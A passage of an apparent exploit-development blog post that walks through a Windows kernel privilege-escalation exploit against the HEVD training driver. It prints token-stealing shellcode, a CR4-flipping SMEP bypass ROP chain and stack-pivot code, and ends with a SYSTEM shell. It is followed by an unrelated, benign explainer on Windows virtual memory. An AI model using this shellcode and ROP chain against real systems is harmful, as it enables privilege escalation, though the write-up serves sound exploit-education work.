0x04, 0x00, 0x00, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01,
0x00, 0x00, 0x66, 0x8b, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x66,
0xff, 0xc1, 0x66, 0x89, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x48,
0x8b, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8a, 0x68,
0x01, 0x00, 0x00, 0x4c, 0x8b, 0x9a, 0x78, 0x01, 0x00, 0x00,
0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xaa,
0x58, 0x01, 0x00, 0x00, 0x31, 0xc0, 0x0f, 0x01, 0xf8, 0x48,
0x0f, 0x07, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff };
// Allocating shellcode in a pre-defined address [0x80000000]
LPVOID shellcode = VirtualAlloc((LPVOID)0x80000000, sizeof(sc), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
RtlCopyMemory(shellcode, sc, 256);
// Allocating Fake Stack with ROP chain in a pre-defined address [0x48000000]
int index = 0;
LPVOID fakeStack = VirtualAlloc((LPVOID)0x48000000, 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
QWORD* _fakeStack = reinterpret_cast<QWORD*>((INT64)0x48000000 + 0x28); // add esp, 0x28
_fakeStack[index++] = SMEPBypass.POP_RCX; // POP RCX
_fakeStack[index++] = 0x3506f8 ^ 1UL << 20; // CR4 value (bit flip)
_fakeStack[index++] = SMEPBypass.MOV_CR4_RCX; // MOV CR4, RCX
_fakeStack[index++] = (INT64)shellcode; // JMP SHELLCODE
USER_CONTROLLED_OBJECT UBUF = { 0 };
// Malicious user-controlled struct
UBUF.ObjectID = 0x4141414141414141;
UBUF.ObjectType = (INT64)SMEPBypass.STACK_PIVOT; // This address will be "[CALL]ed"
if (NtDeviceIoControlFile((HANDLE)sock, nullptr, nullptr, nullptr, &ioStatusBlock, ioctlCode, &UBUF,
0x123, &outBuffer, 0x321) != STATUS_SUCCESS) {
std::cout << "\t[-] Failed to send IOCTL request to HEVD.sys" << std::endl;
}
return 0;
}

int main() {
SMEPBypassInitializer();
exploit();
return 0;
}

After exploit executes, we have the follow WinDBGoutput:

[CALL] pre-calculated addresses, in order to change current RSP value for 0x48000000 (user-controlled)
Segmentation Fault poped out after mov esp, 0x48000000 execution
Analysis of the segmentation faultΒ error

After mov esp, 0x48000000instruction execution, we notice that it crashed and returned a segmentation fault as an exception named UNEXPECTED_KERNEL_MODE_TRAP (7F), now let’s see ourΒ stack.

Stack frame afterΒ crash

So, what can we doΒ next?

Memory and Components

Now this blogpost can really start. After all briefing covering the techniques, it’s time to explain why stack is one of the most confuse things in a exploitation development, we will see how it can easily turn a simple vulnerability attack into a brain-death issue.

Kernel Memory Management

An oversimplification of how a kernel connects application software to the hardware of a computer (wikipedia)

Now, we’ll have to go deep into Memory Managment topic as way to understand concepts about Memory Segments, Virtual Allocation, andΒ Paging.

According to Wikipedia

The kernel has full access to the system’s memory and must allow processes to safely access this memory as they require it. Often the first step in doing this is virtual addressing, usually achieved by paging and/or segmentation. Virtual addressing allows the kernel to make a given physical address appear to be another address, the virtualΒ address.
<…snip…>
In computing, a virtual address space (VAS) or address space is the set of ranges of virtual addresses that an operating system makes available to a process.[1] The range of virtual addresses usually starts at a low address and can extend to the highest address allowed by the computer’s instruction set architecture and supported by the operating system’s pointer size implementation, which can be 4 bytes for 32-bit or 8 bytes for 64-bit OS versions. This provides several benefits, one of which is security through process isolation assuming each process is given a separate addressΒ space.

As we can see, Virtual Addressing refers to the space addressedfor each user-application and kernel functions, reserving memory spaces during a OS usage. When an application is initialized, the operation system understand that needs to allocate new space in memory, addressing into a valid range of addresses, consequently avoiding damaging kernel current memoryΒ region.

That’s the case when you try toplay a game, and for some reason, a bunch of GB’s from your current memory increasesbefore the game starts, all data was allocated and most of this dataand addresses initiates nullified until game file-data starts to be loaded intoΒ memory.

With the use of malloc() and VirtualAlloc() functions, you can actually β€œaddress” a range of Virtual Memory into a defined address, that’s why Stack Pivoting is the best solution for make this exploitΒ works.

Virtual Memory

Address difference betwen physical/virtual memory

As you can see in the above image, Virtual Addresses communicates to application/processby sending data and values, so the processes can be able to query, allocateor freeeach data anyΒ time.

As Wikipedia says:

In computing, virtual memory, or virtual storage,[b] is a memory management technique that provides an β€œidealized abstractionof the storage resources that are actually available on a given machine”[3] which β€œcreates the illusionto users of a very large (main) memory”.[4]
The computer’s operating system, using a combination of hardwareand software, maps memory addresses used by a program, called virtual addresses, into physical addresses in computer memory. Main storage, as seen by a process or task, appears as a contiguous address space or collection of contiguous segments. The operating system manages virtual address spaces and the assignment of real memory to virtual memory.[5] Address translation hardware in the CPU, often referred to as a Memory Management Unit (MMU), automatically translates virtual addresses to physical addresses. Softwarewithin the operating system may extend these capabilities, utilizing, e.g., disk storage, to provide a virtual address space that can exceed the capacity of real memory and thus reference more memory than is physicallypresent in the computer.
The primary benefits of virtual memory include freeingapplications from having to manage a shared memory space, ability to share memory used by libraries betweenprocesses, increased security due to memory isolation, and being able to conceptually use more memory than might be physicallyavailable, using the technique of pagingor segmentation.

As mentioned before, addressing/allocating Virtual Memory ranges (from a user-land perspective), allow us to manipulate de usage of addresses data into our current application, but that’s a problem. When an address range of Virtual Memory is allocated, still not part of OS physical operations due the abstracted/fake allocation into memory. Following the idea of our previous example, when a gamestarts, Virtual Memory is allocated and Memory Management Unit (MMU) automatically traslate data between physical and virtualaddresses.

From a developer perspective, when an application consumes memory, it’s important to free()/VirtualFree() unused data, to preventdata won’t crashthe whole application, once so many addresses are set to be in use by the system. Also, OS can deal with processes which consumes many addresses, automatically closing this ones avoidingcritical errors. There cases that applications exceed the capacity of RAM free space, in this situations, the allocation can be extended into DiskΒ Storage.

Paged Memory

Physical memory also called Paged Memory, imply to memory which is in use by applications and processes. This memory scheme can retrivedata from Virtual Allocations, consequently utilizing it data as part of current execution.

According to Wikipedia:

Memory Paging

In computer operating systems, memory paging (or swappingon some Unix-like systems) is a memory management scheme by which a computer stores and retrieves data from secondary storage[a] for use in main memory.[citation needed] In this scheme, the operating system retrieves data from secondary storage in same-size blocks called pages. Pagingis an important part of virtual memory implementations in modern operating systems, using secondary storage to let programs exceed the size of available physicalΒ memory.

Page faults

When a process tries to reference a page not currently mapped to a page frame in RAM, the processor treats this invalid memory reference as a page fault and transfers control from the program to the operating system.

Page Table

A page table is the data structure used by a virtual memory system in a computer operating system tostore the mapping between virtual addresses and physical addresses. Virtual addresses are used by the program executed by the accessing process, while physical addresses are used by the hardware, or more specifically, by the Random-Access Memory (RAM) subsystem. The page table is a key component of virtual address translation that is necessary to access data inΒ memory.

Kernel can identifies when an address lies in a Paged Memoryspace by utilizing Page Table Entry (PTE)Β , which differs each type of allocation and mapping memory segments.

With Page Table Entry (PTE), Kernel is able to map the correct offset in order to translatedata between each address. If there’s a invalid mapped memory region in the translations, a Page Fault is returned, and OS crashes. In case of Windows Kernel, a _KTRAP_FRAME is called, and an error should be expected asΒ bellow:

Stack Frame after exploit execution

Virtual Allocation issues in WindowsΒ System

When a binary exploit is developed, memory must to be manipulate in most of the cases. Through C/C++ functions as VirtualAlloc(), if you manage to allocate data into address 0x48000000with size 0x1000, your current address 0x48000000are now β€œaddressed” into Page Table as a Virtual Address until 0x48001000 and it will NOT be treat as part of Physical Memory by Kernel (remains as Non-Paged one). It’s important to pay attention in this detail thus if you try to use the example above in a Kernel-Landperspective, a Trap Frame will be handled by WinDBGasΒ follows:

Trying to use Virtual Memory in Kernel scheme cause _KTRAP_FRAME

To deal with this issue, we can use VirtualLock()function from C/C++once it locks the specified region of the process’s virtual address space into physical memory, thus preveting Page Faults. So, with that in mind, we can now changes our Virtual Memory Addressto a Physicalone.

Now should be possible to achieve code execution, right?

<...snip...>
// Allocating Fake Stack with ROP chain in a pre-defined address [0x48000000]
int index = 0;
LPVOID fakeStack = VirtualAlloc((LPVOID)0x48000000, 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
QWORD* _fakeStack = reinterpret_cast<QWORD*>((INT64)0x48000000 + 0x28); // add esp, 0x28
_fakeStack[index++] = SMEPBypass.POP_RCX; // POP RCX
_fakeStack[index++] = 0x3506f8 ^ 1UL << 20; // CR4 value (bit flip)
_fakeStack[index++] = SMEPBypass.MOV_CR4_RCX; // MOV CR4, RCX
_fakeStack[index++] = (INT64)shellcode; // JMP SHELLCODE
// Mapping address to Physical Memory <------------
if (VirtualLock(fakeStack, 0x10000)) {
std::cout << "[+] Address Mapped to Physical Memory" << std::endl;
USER_CONTROLLED_OBJECT UBUF = { 0 };
// Malicious user-controlled struct
UBUF.ObjectID = 0x4141414141414141;
UBUF.ObjectType = (INT64)SMEPBypass.STACK_PIVOT; // This address will be "[CALL]ed"
if (NtDeviceIoControlFile((HANDLE)sock, nullptr, nullptr, nullptr, &ioStatusBlock, ioctlCode, &UBUF,
0x123, &outBuffer, 0x321) != STATUS_SUCCESS) {
std::cout << "\t[-] Failed to send IOCTL request to HEVD.sys" << std::endl;
}
return 0;
}
<...snip...>
Calling our Stack PivotingΒ gadget
Exception fromΒ WinDBG
Again another UNEXPECTED_KERNEL_MODE_TRAP (7f)

Again, the same error popped out even with address mapped into PhysicalΒ Memory.

Pain and Suffer due DoubleFaults

After million of tests, with different patterns of memory allocations, i’ve found a solution attempt. According to Martin Mielke and kristal-g, a reserved memory space should be used before the main allocation from address 0x48000000.

Kristal-G explanation about the cause of DoubleFault Exception
0x47fffff70 address being used by StackFrame

When a Trap Frameoccur, we can clearly notice that lower addresses from 0x48000000are used by stack, and if these addresses keeps with unallocated status, they can’t be used by current stackΒ frame.

As you can see, 0x47fffff70is being utilized by ourstack frame, but once we are starting the allocation from 0x48000000address, it won’t be a valid one. To deal with this issue, a reservationmemory before 0x48000000 must beΒ done.

<...snip...>
LPVOID fakeStack = VirtualAlloc((LPVOID)((INT64)0x48000000-0x1000), 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
<...snip...>

Now we can actually allocate into 0x48000000–0x1000 address, finally allowing us to ignore DoubleFaultexception.

Let’s run our exploit again, it shouldΒ works!

Again….
TrapFrame from 0x47fffff70 desapeared after memory allocation

No matter how you give a try to manage memory, changing addresses or fill up stackwith datahoping that works well, it will always catchand returns an exceptioneven when your code seems to be correct. it took me a while 3 monthsof rebooting my VM, and trying to change code to understand why it still happening.

Stack vsΒ DATA

Let’s imagine stack frame as a β€œbig ball pit”, and there are located a bunch of data, and when a new ball is β€œplaced” in this space, all the others β€œchanges” their location. That’s exatcly what happens when you tries to manipulate memory, changing current stack to an another one as mov esp, 0x48000000 does. When a modification of current stack frame is done, the same β€œbelieves” that current Physical Memory are mappedto another processes, and for some reason, you can actually see things like this afterΒ crash.

<...snip...>
LPVOID fakeStack = VirtualAlloc((LPVOID)((INT64)0x48000000 - 0x1000), 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
// Reserved memory before Stack Pivoting
*(INT64*)(0x48000000 - 0x1000) = 0xDEADBEEFDEADBEEF;
*(INT64*)(0x48000000 - 0x900) = 0xDEADBEEFDEADBEEF;

QWORD* _fakeStack = reinterpret_cast<QWORD*>((INT64)0x48000000 + 0x28); // add esp, 0x28
int index = 0;
_fakeStack[index++] = SMEPBypass.POP_RCX; // POP RCX
_fakeStack[index++] = 0x3506f8 ^ 1UL << 20; // CR4 value (bit flip)
_fakeStack[index++] = SMEPBypass.MOV_CR4_RCX; // MOV CR4, RCX
_fakeStack[index++] = (INT64)shellcode; // JMP SHELLCODE
<...snip...>
Crash after mov esp, 0x48000000

After pollute Stack Frame in a reserved space before Stack Pivoting offsetwe can cleary notice that different addresses poped out into our current Stack Frame, but our Trap Frame still remains the same as before 0x47fffe70. If we fill up all stack with 0x41bytes, we’ll notice that some bytes will appear with different values asΒ below:

<...snip...>
// Filling up reserved space memory
RtlFillMemory((LPVOID)(0x48000000 - 0x1000), 0x1000, 'A');
QWORD* _fakeStack = reinterpret_cast<QWORD*>((INT64)0x48000000 + 0x28); // add esp, 0x28
int index = 0;
_fakeStack[index++] = SMEPBypass.POP_RCX; // POP RCX
_fakeStack[index++] = 0x3506f8 ^ 1UL << 20; // CR4 value (bit flip)
_fakeStack[index++] = SMEPBypass.MOV_CR4_RCX; // MOV CR4, RCX
_fakeStack[index++] = (INT64)shellcode; // JMP SHELLCODE
<...snip...>
0x41 bytes into our reserved memory space pops into StackΒ Frame

With this results in mind, we have some alternatives to considerate for this situation:

  • Increase size of reserved memoryspace.
  • Try to find a fix to the Stack Frame due the situation we actually can’t reserve memory before Stack PivotingΒ space.

So, let’s give a try at first to increase the space of our reservedΒ memory

<...snip...>
// Allocating Fake Stack with ROP chain in a pre-defined address [0x48000000]
LPVOID fakeStack = VirtualAlloc((LPVOID)((INT64)0x48000000 - 0x5000), 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
// Filling up reserved space memory
// Size increased to 0x5000
RtlFillMemory((LPVOID)(0x48000000 - 0x5000), 0x5000, 'A');
QWORD* _fakeStack = reinterpret_cast<QWORD*>((INT64)0x48000000 + 0x28); // add esp, 0x28
int index = 0;
_fakeStack[index++] = SMEPBypass.POP_RCX; // POP RCX
_fakeStack[index++] = 0x3506f8 ^ 1UL << 20; // CR4 value (bit flip)
_fakeStack[index++] = SMEPBypass.MOV_CR4_RCX; // MOV CR4, RCX
_fakeStack[index++] = (INT64)shellcode; // JMP SHELLCODE
<...snip...>
mov esp, 0x48000000 won’t caught any error, and our RIP register get fowarded into add esp,Β 0x28
After that, a DoubleFault exception was caught due add esp,Β 0x28
svchost.exe Crashed when add, esp 0x28Β executes

For some reason, after increased our reserved memory before mov esp, 0x48000000, the whole kernel has crashed, and when 0x48000000is moved into our current RSPregister, our stack framechanges to the User Processes Contextdue the size of address it self. That’s why i’ve mentioned before that stack seems to be a β€œBall pit” sometimes, and after all, we still getting the same Trap Frame exception.

No matter how you try to manipulate memory, it always will be caught and it will crash some application, after that, WinDBGwill handle it as an exception and BSODyour system in a terrible horrorΒ movie.

My experience trying everything that i had, to pass through this exception

Breakpoints??…. ooohh!…. Breakpoints!!!!

INT3, a.k.a 0xCCand breakpoints, can be defined as a signalfor any debbugerto catchand stop an execution of attached processesor a current development code. It can be performed by β€œclicking” into a debug option in some part of an IDE UIor by insertingINT3instruction directly into target process through0xCC opcode. So, in a WinDBGcommand line, a command named bp still available to breakpointaddresses asΒ follow:

// Common Breakpoint, just stop into this address before it runs
bp 0x48000000

// Conditional Breakpoint, stop when r12 register is not equal to 1337
// if not equal, changes current r12 value to 0x1337
// if equal, changes r12 reg value with r13 one
bp 0x48000000 ".if( @r12 != 0x1337) { r12=1337 }.else { r12=r13 }"

etc...

Also, it’s possible to enjoy the use of this mechanism to breakpointa shellcode, and see if it code is running correctly during a exploitation development phase.

BYTE sc[256] = {
0xcc, // <--- We send a debbuger signal and stop it execution
// before code execution
0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48,
0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc0, 0x4d,
0x8b, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49, 0x81, 0xe8, 0x48,
0x04, 0x00, 0x00, 0x4d, 0x8b, 0x88, 0x40, 0x04, 0x00, 0x00,
0x49, 0x83, 0xf9, 0x04, 0x75, 0xe5, 0x49, 0x8b, 0x88, 0xb8,
0x04, 0x00, 0x00, 0x80, 0xe1, 0xf0, 0x48, 0x89, 0x88, 0xb8,
0x04, 0x00, 0x00, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01,
0x00, 0x00, 0x66, 0x8b, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x66,
0xff, 0xc1, 0x66, 0x89, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x48,
0x8b, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8a, 0x68,
0x01, 0x00, 0x00, 0x4c, 0x8b, 0x9a, 0x78, 0x01, 0x00, 0x00,
0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xaa,
0x58, 0x01, 0x00, 0x00, 0x31, 0xc0, 0x0f, 0x01, 0xf8, 0x48,
0x0f, 0x07, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff
};

According to Wikipedia:

The INT3 instruction is a one-byte-instruction defined for use by debuggers to temporarily replacean instruction in a running program in order to set a code breakpoint. The more general INT XXh instructions are encoded using two bytes. This makes them unsuitable for use in patching instructions (which can be one byte long); seeΒ SIGTRAP.
The opcode for INT3 is 0xCC, as opposed to the opcode for INT immediate8, which is 0xCD immediate8. Since the dedicated 0xCC opcode has some desired special properties for debugging, which are not shared by the normal two-byte opcode for an INT3, assemblers do not normally generate the generic 0xCD 0x03 opcode from mnemonics.

After an explanation about breakpoints, it’s important to note that every previous tests are made withbreakpointsin order to develop our exploit, but it’s time to forget it and skip all INT3 instructions.

Let’s give a try to re-run our exploit without the needing of breakpointa thing.

cmd.exe opens and no crashes areΒ caught

Kernel won’t crashes anymore, and system memory stillΒ intact!

Now shellcodeis being executed after our SMEPbypass through theROP chainand we’re now able to spawn a NT AUTHORITY\SYSTEMshell.

YES!! VICTORY!!

BAAAM!! Finally!!!! aNT AUTHORITY\SYSTEMshell afterΒ all!

Breakpoints…. HAHA!! BREAKPOINTS!

So, now we can pay attention that breakpointsalso can be a dangerous thing into a exploitation development.

The explanation about this issue seems to be very simple. When WinDBG debbuger catchesan exceptionfrom kernel, Operation Systemgets a signal that something went wrong occurred, but when a Stack Manipulation is being doing, everythingthat you do is an exception. The Operation Systemdon’t understand that β€œan attacker is trying to manipulate Stack”, he just catchand rebootit self because the Stackare different from your current kernelΒ context.

This headhache occurs likeStructured Exception Handling (SEH)vulnerabilities, once when the set of breakpointsand even a debbugerinto a process, can cause crashes or unitilizationof theΒ same.

In my case, a away to pass through exceptionis by ignoring all breakpoints, and let kernel don’t reboot with a Non-Criticalexception.

Final Considerations

With this blogpost, i’ve learned alot of content that i didn’t knew before starting to write. It was a fun experience and extreme technical (specially for me), it took me 2 days to write about a thing which cost me 3 months long! you should probably had 10 minutes read, which is awesome and makes me happyΒ too!

It’s important to note that most of this blogpost are deep explaining about memory itself, and trying to showing off how as an attacker is possible to improve our way to deal with troubles, looking around for all possibilities which can help us to achieve our goals, in that caseNT AUTHORITY\SYSTEM shell.

Beware of Stackand Breakpoints, this things can be a headache sometimes, and you will NEVER know until you think about changes your attack methodoly.

Thanks to the people who helped me along all thisΒ way:

  • First of all, thanks to my husband who holded me on, when I got myself stressed, with no clue what to do, and with alot of nightmares along all thisΒ months!
  • @xct_de
  • @gal_kristal
  • @33y0re

Hope youΒ enjoyed!

Exploit Link (not so important atΒ all)

References

Windows 10 x86/wow64 Userland heap

Introduction Hi all, Over the course of the past few weeks ago, I received a number of "emergency" calls from some relatives, asking me to look at their computer because "things were broken", "things looked different" and "I think my computer got hacked".Β  I quickly realized that their computers got upgraded to Windows 10. We […]

The post Windows 10 x86/wow64 Userland heap first appeared on Corelan Cybersecurity Research.

Exploring Windows virtual memory management

14 August 2017 at 03:23
In a previous post, we discussed the IA-32e 64-bit paging structures, and how they can be used to turn virtual addresses into physical addresses. They're a simple but elegant way to manage virtual address mappings as well as page permissions with varying granularity of page sizes. All of which is provided by the architecture. But as one might expect, once you add an operating system like Windows into the mix, things get a little more interesting.

The problem of per-process memory

In Windows, a process is nothing more than a simple container of threads and metadata that represents a user-mode application. It has its own memory so that it can manage the different pieces of data and code that make the process do something useful. Let's consider, then, two processes that both try to read and write from the memory located at the virtual address 0x00000000`11223344. Based on what we know about paging, we expect that the virtual address is going to end up translating into the same physical address (let's say 0x00000001`ff003344 as an example) in both processes. There is, after all, only one CR3 register per processor, and the hardware dictates that the paging structure root is located in that register.

Figure 1: If the two process' virtual addresses would translate to the same physical address, then we expect that they would both see the same memory, right?

Of course, in reality we know that it can't work that way. If we use one process to write to a virtual memory address, and then use another process to read from that address, we shouldn't get the same value. That would be devastating from a security and stability standpoint. In fact, the same permissions may not even be applied to that virtual memory in both processes.

But how does Windows accomplish this separation? It's actually pretty straightforward: when switching threads in kernel-mode or user-mode (called a context switch), Windows stores off or loads information about the current thread including the state of all of the registers. Because of this, Windows is able to swap out the root of the paging structures when the thread context is switched by changing the value of CR3, effectively allowing it to manage an entirely separate set of paging structures for each process on the system. This gives each process a unique mapping of virtual memory to physical memory, while still using the same virtual address ranges as another process. The PML4 table pointer for each user-mode process is stored in the DirectoryTableBase member of an internal kernel structure called the EPROCESS, which also manages a great deal of other state and metadata about the process.

Figure 2: In reality, each process has its own set of paging structures, and Windows swaps out the value of the CR3 register when it executes within that process. This allows virtual addresses in each process to map to different physical addresses.

We can see the paging structure swap between processes for ourselves if we do a little bit of exploration using WinDbg. If you haven't already set up kernel debugging, you should check out this article to get yourself started. Then follow along below.

Let's first get a list of processes running on the target system. We can do that using the !process command. For more details on how to use this command, consider checking out the documentation using .hh !process. In our case, we pass parameters of zero to show all processes on the system.


We can use notepad.exe as our target process, but you should be able to follow along with virtually any process of your choice. The next thing we need to do is attach ourselves to this process - simply put, we need to be in this process' context. This lets us access the virtual memory of notepad.exe by remapping the paging structures. We can verify that the context switch is happening by watching what happens to the CR3 register. If the virtual memory we have access to is going to change, we expect that the value of CR3 will change to new paging structures that represent notepad.exe's virtual memory. Let's take a look at the value of CR3 before the context switch.


We know that this value should change to the DirectoryTableBase member of the EPROCESS structure that represents notepad.exe when we make the switch. As a matter of interest, we can take a look at that structure and see what it contains. The PROCESS fffffa8019218b10 line emitted by the debugger when we listed all processes is actually the virtual address of that process' EPROCESS structure.


The fully expanded EPROCESS structure is massive, so everything after what we're interested in has been omitted from the results above. We can see, though, that the DirectoryTableBase is a member at +0x028 of the process control block (KPROCESS) structure that's embedded as part of the larger EPROCESS structure.

According to this output, we should expect that CR3 will change to 0x00000006`52e89000 when we switch to this process' context in WinDbg.

To perform the context swap, we use the .process command and indicate that we want an invasive swap (/i) which will remap the virtual address space and allow us to do things like set breakpoints in user-mode memory. Also, in order for the process context swap to complete, we need to allow the process to execute once using the g command. The debugger will then break again, and we're officially in the context of notepad.exe.


Okay! Now that we're in the context we need to be in, let's check the CR3 register to verify that the paging structures have been changed to the DirectoryTableBase member we saw earlier.


Looks like it worked as we expected. We would find a unique set of paging structures at 0x00000006`52e89000 that represented the virtual to physical address mappings within notepad.exe. This is essentially the same kind of swap that occurs each time Windows switches to a thread in a different process.

Virtual address ranges

While each process gets its own view of virtual memory and can re-use the same virtual address range as another process, there are some consistent rules of thumb that Windows abides by when it comes to which virtual address ranges store certain kinds of information.

To start, each user-mode process is allowed a user-mode virtual address space ranging from 0x000`00000000 to 0x7ff`ffffffff, giving each process a theoretical maximum of 8TB of virtual memory that it can access. Then, each process also has a range of kernel-mode virtual memory that is split up into a number of different subsections. This much larger range gives the kernel a theoretical maximum of 248TB of virtual memory, ranging from 0xffff0800`00000000 to 0xffffffff`ffffffff. The remaining address space is not actually used by Windows, though, as we can see below.


Figure 3: All possible virtual memory, divided into the different ranges that Windows enforces. The virtual addresses for the kernel-mode regions may not be true on Windows 10, where these regions are subject to address space layout randomization (ASLR). Credits to Alex Ionescu for specific kernel space mappings.

Currently, there is an extremely large β€œno man's land” of virtual memory space between the user-mode and kernel-mode ranges of virtual memory. This range of memory isn't wasted, though, it's just not addressable due to the current architecture constraint of 48-bit virtual addresses, which we discussed in our previous article. If there existed a system with 16EB of physical memory - enough memory to address all possible 64-bit virtual memory - the extra physical memory would simply be used to hold the pages of other processes, so that many processes' memory ranges could be resident in physical memory at once.

As an aside, one other interesting property of the way Windows handles virtual address mapping is being able to quickly tell kernel pointers from user-mode pointers. Memory that is mapped as part of the kernel has the highest order bits of the address (the 16 bits we didn't use as part of the linear address translation) set to 1, while user-mode memory has them set to 0. This ensures that kernel-mode pointers begin with 0xFFFF and user-mode pointers begin with 0x0000.

A tree of virtual memory: the VAD

We can see that the kernel-mode virtual memory is nicely divided into different sections. But what about user-mode memory? How does the memory manager know which portions of virtual memory have been allocated, which haven't, and details about each of those ranges? How can it know if a virtual address within a process is valid or invalid? It could walk the process' paging structures to figure this out every time the information was needed, but there is another way: the virtual address descriptor (VAD) tree.

Each process has a VAD tree that can be located in the VadRoot member of the aforementioned EPROCESS structure. The tree is a balanced binary search tree, with each node representing a region of virtual memory within the process.

Figure 4: The VAD tree is balanced with lower virtual page numbers to the left, and each node providing some additional details about the memory range.

Each node gives details about the range of addresses, the memory protection of that region, and some other metadata depending on the state of the memory it is representing.

We can use our friend WinDbg to easily list all of the entries in the VAD tree of a particular process. Let's have a look at the VAD entries from notepad.exe using !vad.


The range of addresses supported by a given VAD entry are stored as virtual page numbers - similar to a PFN, but simply in virtual memory. This means that an entry representing a starting VPN of 0x7f and an ending VPN of 0x8f would actually be representing virtual memory from address 0x00000000`0007f000 to 0x00000000`0008ffff.

There are a number of complexities of the VAD tree that are outside the scope of this article. For example, each node in the tree can be one of three different types depending on the state of the memory being represented. In addition, a VAD entry may contain information about the backing PTEs for that region of memory if that memory is shared. We will touch more on that concept in a later section.

Let's get physical

So we now know that Windows maintains separate paging structures for each individual process, and some details about the different virtual memory ranges that are defined. But the operating system also needs a central mechanism to keep track of each individual page of physical memory. After all, it needs to know what's stored in each physical page, whether it can write that data out to a paging file on disk to free up memory, how many processes are using that page for the purposes of shared memory, and plenty of other details for proper memory management

That's where the page frame number (PFN) database comes in. A pointer to the base of this very large structure can be located at the symbol nt!MmPfnDatabase, but we know based on the kernel-mode memory ranges that it starts at the virtual address 0xfffffa80`00000000, except on Windows 10 where this is subject to ASLR. (As an aside, WinDbg has a neat extension for dealing with the kernel ASLR in Windows 10 - !vm 0x21 will get you the post-KASLR regions). For each physical page available on the system, there is an nt!_MMPFN structure allocated in the database to provide details about the page.

Figure 5: Each physical page in the system is represented by a PFN entry structure in this very large, contiguous data structure.

Though some of the bits of the nt!_MMPFN structure can vary depending on the state of the page, that structure generally looks something like this:


A page represented in the PFN database can be in a number of different states. The state of the page will determine what the memory manager does with the contents of that page.

We won't be focusing on the different states too much in this article, but there are a few of them: active, transition, modified, free, and bad, to name several. It is definitely worth mentioning that for efficiency reasons, Windows manages linked lists that are comprised of all of the nt!_MMPFN entries that are in a specific state. This makes it much easier to traverse all pages that are in a specific state, rather than having to walk the entire PFN database. For example, it can allow the memory manager to quickly locate all of the free pages when memory needs to be paged in from disk.

Figure 6: Different linked lists make it easier to walk the PFN database according to the state of the pages, e.g. walk all of the free pages contiguously.

Another purpose of the PFN database is to help facilitate the translation of physical addresses back to their corresponding virtual addresses. Windows uses the PFN database to accomplish this during calls such as nt!MmGetVirtualForPhysical. While it is technically possible to search all of the paging structures for every process on the system in order to work backwards up the paging structures to get the original virtual address, the fact that the nt!_MMPFN structure contains a reference to the backing PTE coupled with some clever allocation rules by Microsoft allow them to easily convert back to a virtual address using the PTE and some bit shifting.

For a little bit of practical experience exploring the PFN database, let's find a region of memory in notepad.exe that we can take a look at. One area of memory that could be of interest is the entry point of our application. We can use the !dh command to display the PE header information associated with a given module in order to track down the address of the entry point.

